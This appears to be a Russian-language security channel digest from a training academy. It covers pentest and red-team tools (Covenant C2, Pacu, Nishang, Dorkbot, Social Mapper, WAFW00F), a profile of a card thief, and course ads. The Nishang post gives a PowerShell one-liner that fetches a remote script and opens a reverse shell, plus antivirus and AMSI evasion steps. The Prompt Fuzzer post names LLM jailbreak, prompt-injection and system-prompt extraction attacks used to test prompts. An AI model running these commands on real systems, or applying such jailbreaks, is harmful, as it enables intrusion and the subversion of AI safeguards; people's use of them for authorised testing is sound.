Codeby

Сейчас антифрод — одно из самых устойчивых и растущих направлений в ИБ. Но у большинства нет понимания: — какие навыки реально требуются? — как выглядит работа антифрод-аналитика? — можно ли перейти в это направление без банковского опыта? 18 февраля мы разберём реальный кейс банковского мошенничества вместе с экспертами Codeby. На практикуме вы увидите: — как выявляется компрометация аккаунта — по каким поведенческим сигналам система отличает клиента от злоумышленника — как аналитик принимает решение при неполных данных В конце практикума можно будет записаться на индивидуальный разбор с экспертом — чтобы понять, подходит ли вам это направление и какие шаги дают усиление вашей позиции. ⌛18.02 | 19:00 МСК | Бесплатно Регистрация: @codebypracticum_bot 🚀Старт курса "Антифрод-аналитик" 2 февраля: узнать подробнее

BPF Linker: Инструмент статической линковки для современных BPF-программ

BPF Linker (bpf-linker) — специализированное решение для статической линковки объектных файлов BPF-программ, разработанное в рамках экосистемы Aya. Инструмент ориентирован на упрощение сборки современных BPF-приложений при сохранении совместимости с устаревшими, более ограничивающими версиями ядра.

В отличие от традиционных линкеров, bpf-linker оперирует не машинным кодом, а LLVM-биткодом. Это позволяет выполнять оптимизацию на уровне промежуточного представления и генерировать эффективный байт-код для виртуальной машины BPF. Инструмент принимает на вход: ▶️Файлы биткода (.bc) LLVM IR (.ll) ▶️Объектные файлы со встроенным биткодом (.o) ▶️Статические библиотеки (.a) ▶️На выходе формируется готовый объектный файл BPF, который может быть загружен в ядро ⬇️Установка

sudo apt install bpf-linker

Проверка

bpf-linker -h

⏺️Оптимизация для устаревших ядер (v1/v2)

bpf-linker --cpu v2 --unroll-loops --ignore-inline-never -o legacy.o *.o

Объектный файл legacy.o, совместимый с ядрами 4.x–5.x. Принудительное встраивание функций и развертка циклов позволяют выполнять сложную логику там, где отсутствует поддержка вызовов функций и циклов. ⏺️Отладка и анализ

bpf-linker --dump-module ./final.ll --log-level debug --log-file ./link.log -o output.o input.o

Команда выполняет линковку входного файла input.o в output.o, сохраняя детальный лог в link.log и финальное LLVM-представление в final.ll. Флаг --log-level debug обеспечивает максимальную детализацию, --dump-module — анализ промежуточного кода. Позволяет диагностировать ошибки линковки, проверять корректность оптимизаций и исследовать генерируемый BPF-код. ⏺️Минимизация размера

bpf-linker -O z --disable-memory-builtins -o minimal.o *.o

Данная команда выполняет линковку всех объектных файлов с агрессивной оптимизацией по размеру (-O z) и отключением экспорта встроенных функций работы с памятью (--disable-memory-builtins). Результирующий файл minimal.o имеет минимально возможный размер. Критически важно для систем с жесткими лимитами на размер загружаемых BPF-программ. 👉Преимущества инструмента - Полноценная статическая линковка для BPF-модулей - Поддержка CO-RE через BTF-генерацию - Обратная совместимость с ограничениями старых ядер #bpflinker #tool #pentest #LLVM 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

💫 «14 февраля, 23:58»

— Алло, поддержка? У нас тут фрод-система ослепла. — В смысле? — Транзакции идут одна за другой. Все с фрод-скорингом 0. Даже те, где явные боты. — Правила включены? — Сто процентов. В админке всё зелёное. — Антифрод перезагружали? — Три раза. Бесполезно. — Логи смотрели? Ошибки есть? — Ни одной. Всё штатно работает. Но правила молчат. — Нагрузка какая? — Пиковая. В два раза выше обычного. Сегодня же 14 февраля. — А какой час? — 23:58. — Так. А ну-ка глянь, кто и когда последний раз в код залезал. — Сейчас... Вчера вечером был коммит. Что-то про праздничную акцию. — Ищите в коде сегодняшнюю дату. Быстро.

💫 Вопрос: Какая строчка кода могла вырубить антифрод на весь День всех влюбленных и почему?

🚩 Новые задания на платформе HackerLab! 🌍 Категория Веб — ПОСТимся —————————————— 🗂 В архив добавлены задания + райтапы: 🔵Разное - В поисках флага 🔵Pentest Machines - Тревожный сигнал Приятного хакинга!

Мы обновили курс SQL Injection Master Что стало лучше: ⏺️ Оптимизировали логику работы заданий и систему проверки ответов ⏺️ Повысили стабильность лабораторий и корректность работы под нагрузкой ⏺️ Обновили интерфейс и улучшили пользовательский опыт ⏺️ Доработали отдельные задания для более корректного и предсказуемого поведения ⏺️ Добавили бонусный материал для всех, кто успешно сдал экзамен Если уже проходили курс — загляните ещё: стало удобнее и стабильнее. Если нет, то самое время начать ➡️ тут

Как усилить свою позицию на рынке ИБ в 2026? Академия Кодебай предлагает системный подход с поддержкой экспертов! Если вы планируете развиваться в ИБ или углубить текущую специализацию, сейчас открыты наборы по направлениям: ⏺️ DevSecOps-инженер ⏺️ DFIR (цифровая криминалистика и реагирование на инциденты Linux) ⏺️ Реверсивный инжиниринг (Windows и базовый курс) ⏺️ Основы информационной безопасности ⏺️ AppSec инженер ⏺️ Профессия Пентестер ⏺️ Анализ защищенности Android-приложений Формат — практическое обучение с фокусом на инженерные навыки:

CI/CD и безопасность инфраструктуры, анализ инцидентов, работа с артефактами, исследование ПО без исходников, SAST/DAST, тестирование на проникновение, мобильная безопасность.

Ближайшие старты: 9 и 16 февраля. По части программ можно присоединиться к текущей группе. Трудности с выбором? Мы готовы подобрать карьерный трек под ваши цели. Пишите @CodebyAcademyBot и получите бесплатную консультацию. Посмотрите программу и даты стартов: ▶️https://codeby.academy/codeby-courses-fixed.html

Для всех влюбленных в ИБ!

Иногда достаточно небольшого жеста, чтобы в мире логики и переменных возникло что‑то безусловное. Напомните о своих чувствах на вашем языке — это будет по‑настоящему.

Или подарите им наш сертификат, чтобы сделать сюрприз по‑настоящему особенным. P. S. Дарим лимитированную коллекцию нашего мерча при покупке любого курса с 13 по 14 февраля! (об условиях акции и сроках проведения уточняйте у нашего менеджера) С любовью, Академия Кодебай 💚 @CodebyAcademyBot

Тем временем у нас взят first blood на про-лабе Mr.Robot 👀 Это цепочка из 3 взаимосвязанных машин с вайбом одноимённого сериала: от первой веб-зацепки переходим к скрытым сервисам, внутренней сети и нестандартным протоколам Если хочется пройти цепочку самому — лаборатория тут: hackerlab.pro/labs/mrrobot

В истории киберпреступности мало фигур, сопоставимых с Альбертом Гонсалесом. Сын кубинских эмигрантов прошел путь от школьника, взломавшего NASA, до информатора Секретной службы и одновременно лидера банды, укравшей данные 170 миллионов банковских карт. ⏺️Как все начиналось Гонсалес родился в Майами. В 12 лет сам купил первый компьютер, а к 14 взломал сети NASA. Учителя называли его «проблемным лидером группы ботаников». В 1999-м он с приятелями взломал правительственные сервера Индии — визит ФБР закончился лишь предупреждением. ⏺️Shadowcrew и вербовка К 2002 году Гонсалес переехал в Нью-Джерси и стал ключевой фигурой на подпольном форуме Shadowcrew. Под ником CumbaJohnny он торговал крадеными кредитками. В 2003-м его арестовали случайно — полицейский обратил внимание на парня в женском парике. При нем нашли 15 поддельных карт, а дома — миллионы номеров. Но вместо тюрьмы Гонсалесу предложили сделку: свобода в обмен на сотрудничество.

Он помог внедрить агентов в администрацию Shadowcrew и даже предложил перенести серверы форума на оборудование, которое «принадлежало ему». На самом деле серверы стояли в армейском гараже под контролем Секретной службы. В 2004 году 28 участников Shadowcrew арестовали.

⏺️«Разбогатей или умри» Гонсалес вернулся в Майами и формально продолжил сотрудничать с властями, но втайне собрал новую команду. С 2005 по 2007 год они внедряли снифферы в Wi-Fi сети крупнейших ритейлеров. Первой жертвой стала сеть TJX Companies — украдено 40 миллионов номеров карт. В конце 2007-го взломали платежную систему Heartland Payment System, 7-Eleven и Hannaford Bros.

Общий улов — еще

130 миллионов

карт. Операцию назвали

«Get rich or die tryin’»

по мотивам альбома

50 Cent

.

⏺️Арест и приговор 7 мая 2008 года ФБР арестовало Гонсалеса. К тому моменту он успел закопать 1,1 миллиона долларов в пластиковых контейнерах на заднем дворе родителей (следователи нашли их по карте, нарисованной самим хакером). Он купил квартиру в Майами, BMW, Rolex и кольцо Tiffany. Ему грозило пожизненное. Адвокаты пытались давить на диагнозы: синдром Аспергера, интернет-зависимость, но судью Патти Сарис это не убедило. 25 марта 2010 года Гонсалеса приговорили к 20 годам лишения свободы с конфискацией 2,7 миллиона долларов. ⏺️Что с ним сейчас На 2026 год Альберту Гонсалесу 44 года, он все еще в заключении. Приговор вынесен в 2010-м, срок идет с ареста в 2008-м. Освобождение ожидается не ранее 2028 года. Информации о досрочном освобождении нет. Гонсалес вошел в историю как человек, воплотивший двойной стандарт борьбы с киберпреступностью: охотник и дичь, агент и предатель.

Ущерб от его действий превысил 200 миллионов долларов. Он не был активистом — просто охотником за деньгами, который слишком долго испытывал удачу. Его дело до сих пор изучают в Академии ФБР как классический кейс «крота» из мира хакинга.

#Гонсалес #CumbaJohnny #TJX #NASA #Shadowcrew #news

🗺 Social Mapper

Инструмент с открытым исходным кодом, который использует технологию распознавания лиц для сопоставления профилей в социальных сетях на разных платформах. Автоматически ищет в указываемых социальных сетях имена и фотографии целей для точного определения и группировки профилей. По результатам работы генерирует отчет.

Поддерживает поиск в следующих социальных сетях: ⏺️LinkedIn; ⏺️Facebook; ⏺️Pinterest; ⏺️Twitter; ⏺️Google Plus; ⏺️Instagram; ⏺️ВКонтакте; ⏺️Weibo; ⏺️Douban. Установка 1️⃣Для работы требуется предварительная установка Firefox.

sudo add-apt-repository ppa:mozillateam/firefox-next && sudo apt update && sudo apt upgrade

2️⃣Установить Geckodriver для и убедиться, что он находится в переменной PATH. 3️⃣Далее необходимы следующие компоненты:

sudo apt-get install build-essential cmake
sudo apt-get install libgtk-3-dev
sudo apt-get install libboost-all-dev

4️⃣Клонирование репозитория и установка зависимостей:

git clone https://github.com/Greenwolf/social_mapper
cd social_mapper/setup
python3 -m pip install --no-cache-dir -r requirements.txt

5️⃣Завершающим шагом необходимо в браузере для каждой социальной сети войти в профиль и сохранить страницы со статусом "trust this browser" или "unknown browser". ➡️Использование Для запуска инструмента необходимо указать 4 параметра: формат ввода, входной файл или папку и основной режим работы: -f, --format - форматы вида name, csv, imagefolder, socialmapper; -i, --input - название компании, файл CSV, папка с изображениями или HTML-файл; -m, --mode - fast или accurate позволяет выбрать пропуск потенциальных целей после нахождения первого вероятного совпадения, что в некоторых случаях может многократно ускорить работу программы 💻Примеры Быстрая проверка в Facebook и Twitter некоторых целей, которые хранятся в папке с изображениями:

python3 social_mapper.py -f imagefolder -i ./Input-Examples/imagefolder/ -m fast -fb -tw

Проверка компании Evil Corp LLC, где количество ложных срабатываний должно быть сведено к минимуму:

python3 social_mapper.py -f company -i "Evil Corp LLC" -m accurate -a -t strict

#osint #tool #search 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🧠 Prompt Fuzzer — интерактивный fuzzer для защиты системного промпта GenAI‑приложений

Prompt Fuzzer — это open source‑утилита для динамического тестирования системного промпта на устойчивость к jailbreak‑атакам, prompt‑инъекциям и попыткам вытянуть системные данные

💻 Что умеет Prompt Fuzzer 🔔 Моделирует реальные атаки на промпт: jailbreak (DAN, AIM, harmful behavior, amnesia, linguistic evasion и др.), prompt injection (authoritative role, typoglycemia и др.) и системный prompt extraction 🔔 Динамически адаптирует тесты под домен и конфигурацию конкретного приложения, чтобы проверки были ближе к боевым сценариям использования. 🔔 Выдаёт оценку безопасности промпта по каждой атаке: broken (сломали защиту), resilient (выдержал), errors (неоднозначный результат), помогая понять, где именно промпт уязвим. ⬇️ Установка и запуск 👉 Установка через pip:

pip install prompt-security-fuzzer

👉 Затем задать ключ LLM‑провайдера (по умолчанию OPENAI_API_KEY):

export OPENAI_API_KEY=sk-123XXXXXXXXXXXX
prompt-security-fuzzer

👉 Переменные окружения - Можно использовать .env рядом с утилитой, либо экспортировать ключи напрямую. - Поддерживаются 16+ провайдеров: OpenAI, Anthropic, Azure OpenAI, Cohere, Google PaLM, YandexGPT, Baichuan, Jina, PromptLayer и др. через свои ENV‑ключи (ANTHROPIC_API_KEY, GOOGLE_API_KEY, YC_API_KEY и т.п.). 🧾 Режимы работы и CLI ⏺️ Интерктивный режим (по умолчанию): 1) Запускаете prompt-security-fuzzer, 2) Вставляете системный промпт, 3) Запускаете серию атак и потом дорабатываете промпт в встроенном Playground‑чате. ⏺️ Batch‑режим для CI/CD и автопроверок: ➡️ Прогнать тесты по готовому файлу с системным промптом:

prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt

➡️ Подключить кастомный бенчмарк атак:

prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
  --custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv

➡️ Запустить только подмножество тестов:

prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
  --custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv \
  --tests='["ucar","amnesia"]'

#security #ai #llm #tool 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

☁️ Covenant — .NET C2‑фреймворк для пост-эксплуатаци

Covenant — кросс-платформенный C2 на ASP.NET Core с веб‑панелью, много‑пользовательским режимом и поддержкой «Grunt»‑имплантов для управления скомпрометированными хостами в корпоративных сетях.

⛓️‍💥 Основные возможности Covenant 📉 Интуитивный web‑интерфейс: управление слушателями, имплантами (Grunts), задачами, файлами и отчётами прямо из браузера, с поддержкой нескольких операторов одновременно. 📉 Мульти-платформенность и Docker: сервер на .NET Core можно запускать на Linux, Windows и macOS, а также в Docker‑контейнере, что удобно для lab‑окружений и изолированных C2‑хостов. 🖱 Listener Profiles: профили слушателей позволяют кастомизировать HTTP(S)/Network‑трафик, маскируя его под легитимные запросы и упрощая обход детекта. 🧠 Импланты Grunt и криптография ⏺️ Grunt — это .NET‑имплант, который периодически коннектится к слушателю, получает команды, исполняет их и отправляет результаты, поддерживая типичные C2‑операции (команды, файлы, модульные задачи). ⏺️ Реализован защищённый обмен ключами + опциональный SSL, что обеспечивает forward secrecy и защищает трафик от пассивного прослушивания. ⏺️ Dynamic Compilation: каждое новое задание или Grunt компилируются «на лету» через Roslyn и обфусцируются ConfuserEx, что снижает количество полностью статичных сигнатурных пейлоадов. ⬇️ Установка и запуск 1️⃣ Быстрый старт через .NET / git ▶️ Клонировать репозиторий и собрать приложение:

git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run

▶️ Затем открыть панель по адресу вида https://127.0.0.1:7443/, создать учётку оператора и перейти к настройке Listener/Launcher/Grunt. 2️⃣ Запуск через Docker ▶️ Использовать готовый Docker‑образ и пробросить порты + volume для хранения данных:

docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant

▶️ После старта сервер работает как обычный C2‑бэкенд, доступный по HTTPS для всей команды. #c2 #dotnet #redteam #tool 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Dorkbot: Автоматизированный инструмент для поиска уязвимостей через поисковые системы

Dorkbot — модульный инструмент командной строки с открытым исходным кодом, предназначенный для автоматизации поиска уязвимостей на веб-ресурсах, обнаруженных через публичные поисковые системы или архивы интернета (Common Crawl и Wayback Machine). Его архитектура разделяет процессы сбора целей (индексирования) и их проверки (сканирования), что обеспечивает гибкость и контроль на каждом этапе безопасности.

👉Dorkbot функционирует на основе модульной системы, состоящей из двух ключевых компонентов: ▶️Индексаторы (Indexers) - модули, отвечающие за сбор списка целей (URL-адресов). Они выполняют поисковые запросы через различные источники ▶️Сканеры (Scanners) - модули, которые выполняют непосредственно проверку безопасности каждой собранной цели на наличие уязвимостей

Все обнаруженные цели сохраняются в базе данных, что позволяет управлять ими, отслеживать статус проверки и избегать дублирования. После сканирования формируется детальный отчет в формате

JSON

, содержащий информацию о найденных уязвимостях.

⬇️Установка

pipх install dorkbot 

Проверка

dorkbot -h

⏺️Выполним поиск целей через Google Custom Search API (индексатор google_api) и сразу сканируем 10 случайных целей из найденных с помощью сканера Wapiti

dorkbot -i google_api -o key=YOUR_API_KEY -o engine=YOUR_CSE_ID -o query="inurl:view.php?id=" -s wapiti --count 10 --random --log scan_session.log

▶️-i google_api и -o - активируют индексатор Google API и передают ему необходимые аргументы (ключ, ID поисковой системы и поисковый запрос) ▶️-s wapiti - указывает сканер для проверки уязвимостей ▶️--count 10 - ограничивает обработку (индексацию и/или сканирование) 10 целями ▶️--random - обеспечивает случайный порядок выбора целей для обработки, что полезно для выборки ▶️--log scan_session.log - перенаправляет вывод логов в указанный файл для последующего анализа ⏺️Эта команда демонстрирует работу с базой данных целей и блоклистом без запуска сканирования

dorkbot -d /opt/security/dorkbot.db --list-targets --unscanned-only --add-blocklist-item "regex:.*logout.*" --add-blocklist-item "host:admin.example.com" --prune

▶️-d /opt/security/dorkbot.db - указывает путь к файлу базы данных SQLite ▶️--list-targets --unscanned-only - выводит список всех целей, которые еще не были отсканированы ▶️--add-blocklist-item - добавляет правила в блоклист. В данном случае блокируются все URL, содержащие подстроку logout (регулярное выражение), и все цели с хостом admin.example.com ▶️--prune - критически важная операция, которая применяет правила блоклиста и систему отпечатков (fingerprinting) к существующей базе данных.

Цели, соответствующие новым правилам блоклиста, будут помечены как отсканированные (или удалены, если добавить флаг -m), а дубликаты на основе отпечатков будут исключены из очереди на сканирование

#dorkbot #tool #pentest #URL 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🤖 Как выявлять и предотвращать утечки информации по сетевым скрытым каналам Команда HEX.TEAM приглашает на открытый профессиональный вебинар «Противодействие утечке информации по сетевым скрытым каналам» — с разбором теории, практики и реальных кейсов из проектов. О чём поговорим: • как строятся классические и современные сетевые скрытые каналы в различных сетевых протоколах • как определить, является ли угроза утечки информации по сетевым скрытым каналам реальной для вашей организации • как выстраивается система защиты от подобных утечек 📅 Дата: 18/02/2026 🕓 Время: 16:00 💻 Онлайн, участие бесплатное Спикер: Михаил Финошин руководитель отдела исследований ИБ HEX.TEAM старший преподаватель кафедры «Криптология и кибербезопасность» НИЯУ МИФИ автор более 15 научных публикаций по информационной безопасности Количество мест ограничено. 👉 Регистрация на вебинар 👈 Подписывайтесь на канал HEX.TEAM - здесь мы регулярно делимся практикой, кейсами и инженерным взглядом на информационную безопасность. Реклама. Erid: 2VtzqvmkHqd

🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры. 🎇 Основные возможности Pacu 📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами. 📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов. 🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования. 💻 Базовый сценарий использования ▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения. ▶️ Через команду set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом. ▶️ Команды list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1). ⬇️ Установка и запуск ⏺️ Установка Pacu и зависимостей:

pip3 install -U pip
pip3 install -U pacu
pacu

⏺️ При первом запуске задать имя сессии и затем добавить AWS‑ключи командой set_keys по интерактивным подсказкам. 2️⃣ Запуск через Docker ⏺️ Запуск с дефолтным entrypoint:

docker run -it rhinosecuritylabs/pacu:latest

⏺️ Для работы с реальными AWS‑кредитами можно примонтировать локальные ~/.aws в контейнер

docker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest

#aws #security #pentest #tool 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов

WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.

👉WAFW00F использует трехуровневый подход для определения WAF: ▶️Пассивный анализ - отправляет обычный HTTP-запрос и ищет сигнатуры в заголовках (например, X-Protected-By, Server), cookies или HTML-коде. Многие WAF оставляют уникальные следы ▶️Активное тестирование - если пассивный анализ не сработал, отправляет подозрительные запросы (инъекции SQL, XSS). Анализирует ответы на блокировку (специальные страницы ошибок, коды состояния (403, 406) или заголовки) ▶️Эвристический анализ - если первые два шага не дали результата, применяет алгоритмы к собранным ответам, чтобы определить, реагирует ли система безопасности на зондирование.

База сигнатур включает более

150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)

.

⬇️Установка

pipх install wafw00f

Проверка

wafw00f -h

⏺️Базовая проверка

wafw00f https://example.org

При успешном обнаружении вывод будет содержать информацию о производителе и модели WAF. ⏺️Просмотр полного списка детектируемых систем защиты

wafw00f -l

Эта команда выводит обширную таблицу с именами WAF и их производителями, что полезно для ознакомления с возможностями инструмента. ⏺️Проверка нескольких целей и вывод в файл

wafw00f https://site1.com http://site2.net -o results.json

Флаг -o (или --output) позволяет экспортировать результаты в файл. Формат (JSON, CSV, plain text) определяется по расширению файла (.json, .csv, .txt). ⏺️Агрессивное тестирование для выявления всех возможных WAF

wafw00f https://target.com -a -v

Ключ -a (--findall) заставляет инструмент продолжить тестирование даже после первого успешного совпадения, чтобы найти все возможные WAF. Флаг -v увеличивает детализацию вывода. #WAFW00F #tool #pentest #WAF 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды». ⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence). ⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS. ⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью. ☁️ Базовый сценарий использования ➡️ Импорт всех скриптов в сессию:

Import-Module .\nishang.psm1  

Или dot‑sourcing отдельных:

. C:\nishang\Gather\Get-Information.ps1
Get-Information

➡️ Помощь по скриптам: Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию). ➡️ In‑memory запуск с удалённого хоста (через web shell/meterpreter):

powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>

⬇️ Установка и запуск 🔔 Быстрый старт - Клонировать репозиторий и импортировать в PowerShell v3+:

git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1

- Для обхода AV использовать Invoke-Encode:

. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand

Затем запустить encodedcommand на цели: powershell -e <encoded> 🔔 Обход AMSI и AV ➡️ Скрипты часто детектятся, но работают in‑memory; для AMSI в Win10+ — используйте Invoke-AmsiBypass или кастомизацию имён функций/параметров. ➡️ Для non‑PowerShell шеллов — encodedcommand с вызовом экспортированной функции внутри скрипта. #powershell #redteam #pentest #tool 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

🚩 Новые задания на платформе HackerLab! 🎢 Категория Разное — Drakosha Ali 🔎 Категория OSINT — Спецслужбы Приятного хакинга!

Adversarial Robustness Toolbox (ART) — это Python‑библиотека для безопасности моделей машинного обучения: она помогает атаковать, защищать и проверять ML‑системы на устойчивость к угрозам вроде подмены входных данных или отравления обучающей выборки. 🔎 Что такое ART и кому она нужна ART развивается под эгидой Linux Foundation AI & Data и изначально была запущена IBM как открытый инструмент для исследований в области adversarial machine learning. Библиотека ориентирована одновременно на red team и blue team. ❗️ Поддерживаемые фреймворки, данные и задачи ➡️ Фреймворки: TensorFlow, Keras, PyTorch, MXNet, scikit‑learn, XGBoost, LightGBM, CatBoost, GPy и др., то есть большинство популярных стеков для классического ML и DL. ➡️ Типы данных: изображения, табличные данные, аудио, видео и другие форматы, что позволяет тестировать как CV‑модели, так и, например, речь или временные ряды. ➡️ Задачи: классификация, детекция объектов, генерация, задачи сертификации и верификации устойчивости и т.п. ⛓️‍💥 Типы атак в ART ART реализует десятки сценариев, сгруппированных вокруг четырёх основных классов угроз: ⏺️Evasion: небольшие модификации входных данных, которые заставляют модель ошибаться (adversarial examples для картинок, аудио и т.д.). ⏺️Poisoning: изменение обучающей выборки для скрытого влияния на поведение модели в проде. ⏺️Extraction: попытка «украсть» модель через массовые запросы к её API и восстановить или клонировать её поведение. ⏺️Inference: атаки на приватность, когда по ответам модели пытаются восстановить данные обучения. #ai #security #adversarial #tool 🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером